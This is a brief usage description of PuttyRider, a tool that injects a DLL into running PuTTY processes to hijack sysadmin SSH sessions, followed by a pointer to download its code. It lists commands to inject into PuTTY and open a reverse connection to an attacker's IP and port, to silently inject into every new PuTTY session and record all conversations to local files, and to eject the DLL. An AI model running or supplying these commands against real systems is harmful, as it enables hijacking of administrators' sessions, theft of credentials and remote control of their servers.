Puttyrider targets sysadmin tool putty. This tiny utility hijacks putty sessions and injects code in open sessions.
List existing Putty processes and their status (injected / not injected)
Inject DLL into the first found putty.exe and initiate a reverse connection from DLL to my IP:Port, then exit PuttyRider.exe.
PuttyRider.exe -p 0 -r 192.168.0.55:8080
Run in background and wait for new Putty processes. Inject in any new putty.exe and write all conversations in local files.
PuttyRider.exe -w -f
Eject PuttyRider.dll from all Putty processes where it is already injected. (Don’t forget to kill PuttyRider.exe if running in -w mode, otherwise it will reinject again.)
PuttyRider.exe -x Download, code, details here